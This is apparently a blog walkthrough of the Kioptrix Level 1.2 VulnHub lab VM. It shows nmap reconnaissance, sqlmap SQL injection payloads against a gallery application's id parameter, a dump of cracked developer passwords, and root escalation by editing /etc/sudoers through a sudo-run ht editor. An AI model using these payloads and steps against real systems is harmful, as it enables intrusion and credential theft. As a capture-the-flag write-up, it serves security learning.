Kioptrix: Level 1.2 Walkthrough

Kioptrix is a boot to root virtual machine which is hosted on Vulnhub.

Description of the challenge
“It’s been a while since the last Kioptrix VM challenge. Life keeps getting the way of these things you know.After the seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges. I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated.As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being the realm of the beginner I must add. The same as the others, there’s more then one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to ones own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com
Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost127.0.0.1 static3.cdn.ubi.com
192.168.1.102 kioptrix3.com
Under Linux that would be /etc/hosts
There’s a web application involved, so to have everything nice and properly displayed you really need to this.
Hope you enjoy Kioptrix VM Level 1.2 challenge.
452 Megs
MD5 Hash : d324ffadd8e3efc1f96447eec51901f2
Have fun”

Identify the IP address of Kioptrix machine
Nmap Ping Scan

root@kali:~# nmap -sn 192.168.1.1/24
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-12 16:34 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0034s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for 192.168.1.3
Host is up (0.23s latency).
MAC Address: B0:DF:3A:DE:59:08 (Samsung Electronics)
Nmap scan report for 192.168.1.4
Host is up (0.23s latency).
MAC Address: B4:4B:D2:8C:6F:38 (Unknown)
Nmap scan report for 192.168.1.5
Host is up (0.23s latency).
MAC Address: 08:6D:41:BA:BD:EC (Unknown)
Nmap scan report for 192.168.1.7
Host is up (0.23s latency).
MAC Address: 70:77:81:C0:6C:33 (Hon Hai Precision Ind.)
Nmap scan report for 192.168.1.9
Host is up (0.23s latency).
MAC Address: 54:EA:A8:7A:43:03 (Apple)
Nmap scan report for 192.168.1.11
Host is up (0.00031s latency).
MAC Address: F4:0F:24:33:5E:D1 (Unknown)
Nmap scan report for 192.168.1.13
Host is up (0.15s latency).
MAC Address: 68:37:E9:88:16:5F (Unknown)
Nmap scan report for 192.168.1.20
Host is up (0.00046s latency).
MAC Address: 08:00:27:A7:51:4E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.16
Host is up.
Nmap done: 256 IP addresses (10 hosts up) scanned in 7.51 seconds
root@kali:~#

Identify services running on Kioptrix

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 192.168.1.20
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-12 16:34 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Initiating ARP Ping Scan at 16:34
Scanning 192.168.1.20 [1 port]
Completed ARP Ping Scan at 16:34, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:34
Completed Parallel DNS resolution of 1 host. at 16:34, 0.02s elapsed
Initiating Connect Scan at 16:34
Scanning 192.168.1.20 [65535 ports]
Discovered open port 22/tcp on 192.168.1.20
Discovered open port 80/tcp on 192.168.1.20
Completed Connect Scan at 16:34, 3.67s elapsed (65535 total ports)
Initiating Service scan at 16:34
Scanning 2 services on 192.168.1.20
Completed Service scan at 16:34, 6.05s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.20
NSE: Script scanning 192.168.1.20.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.22s elapsed
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Nmap scan report for 192.168.1.20
Host is up (0.00040s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 08:00:27:A7:51:4E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.013 days (since Fri May 12 16:15:26 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=204 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.40 ms 192.168.1.20
NSE: Script Post-scanning.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.01s elapsed
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.33 seconds
Raw packets sent: 20 (1.626KB) | Rcvd: 16 (1.338KB)
root@kali:~#

Port 22 — Inspecting SSH — OpenSSH 4.7p1

root@kali:~# ssh kioptrix@192.168.1.20
The authenticity of host '192.168.1.20 (192.168.1.20)' can't be established.
RSA key fingerprint is SHA256:NdsBnvaQieyTUKFzPjRpTVK6jDGM/xWwUi46IR/h1jU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.20' (RSA) to the list of known hosts.
kioptrix@192.168.1.20's password:
Permission denied, please try again.
kioptrix@192.168.1.20's password:
Permission denied, please try again.
kioptrix@192.168.1.20's password:

No OpenSSH exploit matching our version was found.

Port 80 — Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4–2ubuntu5.6 with Suhosin-Patch)

We are presented with a /index.php page.

Lets browse the website and get a feel of it by following along the various links on the page.

http://192.168.1.20/
http://192.168.1.20/gallery/
http://kioptrix3.com/gallery/g.php/1
http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos
http://192.168.1.20/index.php?system=Blog
http://192.168.1.20/index.php?system=Admin

We can see 2 GET parameters id and sort. Testing these parameters for SQL Injection.

http://kioptrix3.com/gallery/gallery.php?id=1'&sort=photoid#photos

This confirms that id parameter is vulnerable to SQL injection.
Exploitation using Sqlmap

root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid" --dbms=MySQL
_
___ ___| |_____ ___ ___ {1.0.9.1#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:57:09
[16:57:09] [INFO] testing connection to the target URL
[16:57:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
[16:57:09] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-8555 OR 3997=3997#&sort=filename
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 2488 FROM(SELECT COUNT(*),CONCAT(0x716b7a7071,(SELECT (ELT(2488=2488,1))),0x7170626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sort=filename
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)&sort=filename
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x716b7a7071,0x5165447676486b4d644563776c6b5073527a51764c654e644548634b7a55725a6345414c5a646558,0x7170626271),NULL,NULL,NULL,NULL,NULL#&sort=filename
---
[16:57:09] [INFO] testing MySQL
[16:57:09] [INFO] confirming MySQL
[16:57:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0

[16:57:09] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[16:57:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'
[*] shutting down at 16:57:09
root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid" --dbms=MySQL --dbs
_
___ ___| |_____ ___ ___ {1.0.9.1#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:58:53
[16:58:53] [INFO] testing connection to the target URL
[16:58:53] [INFO] heuristics detected web page charset 'ISO-8859-2'
[16:58:53] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-8555 OR 3997=3997#&sort=filename
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 2488 FROM(SELECT COUNT(*),CONCAT(0x716b7a7071,(SELECT (ELT(2488=2488,1))),0x7170626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sort=filename
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)&sort=filename
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x716b7a7071,0x5165447676486b4d644563776c6b5073527a51764c654e644548634b7a55725a6345414c5a646558,0x7170626271),NULL,NULL,NULL,NULL,NULL#&sort=filename
---
[16:58:54] [INFO] testing MySQL
[16:58:54] [INFO] confirming MySQL
[16:58:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[16:58:54] [INFO] fetching database names
[16:58:54] [INFO] the SQL query used returns 3 entries
[16:58:54] [INFO] resumed: information_schema
[16:58:54] [INFO] resumed: gallery
[16:58:54] [INFO] resumed: mysql
available databases [3]:
[*] gallery
[*] information_schema
[*] mysql
[16:58:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[16:58:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'
[*] shutting down at 16:58:54
root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid" --dbms=MySQL -D gallery --tables
_
___ ___| |_____ ___ ___ {1.0.9.1#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:00:27
[17:00:27] [INFO] testing connection to the target URL
[17:00:27] [INFO] heuristics detected web page charset 'ISO-8859-2'
[17:00:27] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-8555 OR 3997=3997#&sort=filename
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 2488 FROM(SELECT COUNT(*),CONCAT(0x716b7a7071,(SELECT (ELT(2488=2488,1))),0x7170626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sort=filename
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)&sort=filename
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x716b7a7071,0x5165447676486b4d644563776c6b5073527a51764c654e644548634b7a55725a6345414c5a646558,0x7170626271),NULL,NULL,NULL,NULL,NULL#&sort=filename
---
[17:00:27] [INFO] testing MySQL
[17:00:27] [INFO] confirming MySQL
[17:00:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[17:00:27] [INFO] fetching tables for database: 'gallery'
[17:00:27] [INFO] the SQL query used returns 7 entries
[17:00:27] [INFO] resumed: dev_accounts
[17:00:27] [INFO] resumed: gallarific_comments
[17:00:27] [INFO] resumed: gallarific_galleries
[17:00:27] [INFO] resumed: gallarific_photos
[17:00:27] [INFO] resumed: gallarific_settings
[17:00:27] [INFO] resumed: gallarific_stats
[17:00:27] [INFO] resumed: gallarific_users
Database: gallery
[7 tables]
+----------------------+
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
+----------------------+
[17:00:27] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:00:27] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'
[*] shutting down at 17:00:27
root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid" --dbms=MySQL -D gallery -T dev_accounts --dump
_
___ ___| |_____ ___ ___ {1.0.9.1#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:01:16
[17:01:16] [INFO] testing connection to the target URL
[17:01:16] [INFO] heuristics detected web page charset 'ISO-8859-2'
[17:01:16] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-8555 OR 3997=3997#&sort=filename
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 2488 FROM(SELECT COUNT(*),CONCAT(0x716b7a7071,(SELECT (ELT(2488=2488,1))),0x7170626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sort=filename
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)&sort=filename
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x716b7a7071,0x5165447676486b4d644563776c6b5073527a51764c654e644548634b7a55725a6345414c5a646558,0x7170626271),NULL,NULL,NULL,NULL,NULL#&sort=filename
---
[17:01:16] [INFO] testing MySQL
[17:01:16] [INFO] confirming MySQL
[17:01:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[17:01:16] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[17:01:16] [INFO] the SQL query used returns 3 entries
[17:01:16] [INFO] the SQL query used returns 3 entries
[17:01:16] [INFO] resumed: id
[17:01:16] [INFO] resumed: int(10)
[17:01:16] [INFO] resumed: username
[17:01:16] [INFO] resumed: varchar(50)
[17:01:16] [INFO] resumed: password
[17:01:16] [INFO] resumed: varchar(50)
[17:01:16] [INFO] fetching entries for table 'dev_accounts' in database 'gallery'
[17:01:16] [INFO] the SQL query used returns 2 entries
[17:01:16] [INFO] resumed: "1","0d3eccfb887aabd50f243b3f155c0f85","dreg"
[17:01:16] [INFO] resumed: "2","5badcaf789d3d1d09794d8f021f40f0e","loneferret"
[17:01:16] [INFO] analyzing table dump for possible password hashes
[17:01:16] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[17:01:19] [INFO] using hash method 'md5_generic_passwd'
[17:01:19] [INFO] resuming password 'starwars' for hash '5badcaf789d3d1d09794d8f021f40f0e' for user 'loneferret'
[17:01:19] [INFO] resuming password 'Mast3r' for hash '0d3eccfb887aabd50f243b3f155c0f85' for user 'dreg'
[17:01:19] [INFO] postprocessing table dump
Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username | password |
+----+------------+---------------------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
[17:01:19] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[17:01:19] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:01:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'
[*] shutting down at 17:01:19
root@kali:~#

Lets login as dreg

root@kali:~# ssh dreg@192.168.1.20
dreg@192.168.1.20's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Fri May 12 17:04:03 2017 from 192.168.1.16
dreg@Kioptrix3:~$ ls -la
total 24
drwxr-xr-x 2 dreg dreg 4096 2017-05-12 17:04 .
drwxr-xr-x 5 root root 4096 2011-04-16 07:54 ..
-rw-r--r-- 1 dreg dreg 220 2011-04-16 07:54 .bash_logout
-rw-r--r-- 1 dreg dreg 2940 2011-04-16 07:54 .bashrc
-rw-r--r-- 1 dreg dreg 586 2011-04-16 07:54 .profile
dreg@Kioptrix3:~$ cd /
-rbash: cd: restricted
dreg@Kioptrix3:~$ id
uid=1001(dreg) gid=1001(dreg) groups=1001(dreg)
dreg@Kioptrix3:~$ sudo -l
[sudo] password for dreg:
Sorry, user dreg may not run sudo on Kioptrix3.
dreg@Kioptrix3:~$ exit
logout
-rbash: /usr/bin/clear_console: restricted: cannot specify `/' in command names
Connection to 192.168.1.20 closed.
root@kali:~#

Nothing interesting is found here and dreg is not one of the sudoers.
Lets login as loneferret

root@kali:~# ssh loneferret@192.168.1.20
loneferret@192.168.1.20's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Fri May 12 17:14:12 2017 from 192.168.1.16
loneferret@Kioptrix3:~$ ls -la
total 68
drwxr-xr-x 3 loneferret loneferret 4096 2017-05-12 17:15 .
drwxr-xr-x 5 root root 4096 2011-04-16 07:54 ..
-rw-r--r-- 1 loneferret users 95 2017-05-12 17:16 .bash_history
-rw-r--r-- 1 loneferret loneferret 220 2011-04-11 17:00 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 2011-04-11 17:00 .bashrc
-rwxrwxr-x 1 root root 26275 2011-01-12 10:45 checksec.sh
-rw-r--r-- 1 root root 224 2011-04-16 08:51 CompanyPolicy.README
-rw-r--r-- 1 root root 1681 2017-05-12 17:15 .htcfg2
-rw------- 1 root root 15 2011-04-15 21:21 .nano_history
-rw-r--r-- 1 loneferret loneferret 586 2011-04-11 17:00 .profile
drwx------ 2 loneferret loneferret 4096 2011-04-14 11:05 .ssh
-rw-r--r-- 1 loneferret loneferret 0 2011-04-11 18:00 .sudo_as_admin_successful
loneferret@Kioptrix3:~$ ./checksec.sh
Usage: checksec [OPTION]
Options:
--file <executable-file>
--dir <directory> [-v]
--proc <process name>
--proc-all
--proc-libs <process ID>
--kernel
--fortify-file <executable-file>
--fortify-proc <process ID>
--version
--help
For more information, see:
http://www.trapkit.de/tools/checksec.html
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ sudo ht

Since the ht editor is running as root we can open files that only be read by root. So lets open /etc/sudoers.

We can add /bin/bash so that we can run our bash shell as root.

loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)

loneferret@Kioptrix3:~$ sudo /bin/bash
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)

root@Kioptrix3:~# cd /root/
root@Kioptrix3:/root# ls
Congrats.txt ht-2.0.18
root@Kioptrix3:/root# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Steven McElrea
aka loneferret
http://www.kioptrix.com
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
http://www.lotuscms.org
Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/
The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
root@Kioptrix3:/root#

Done !!!

Like what you read? Give Kanishka a round of applause.

From a quick cheer to a standing ovation, clap to show how much you enjoyed this story.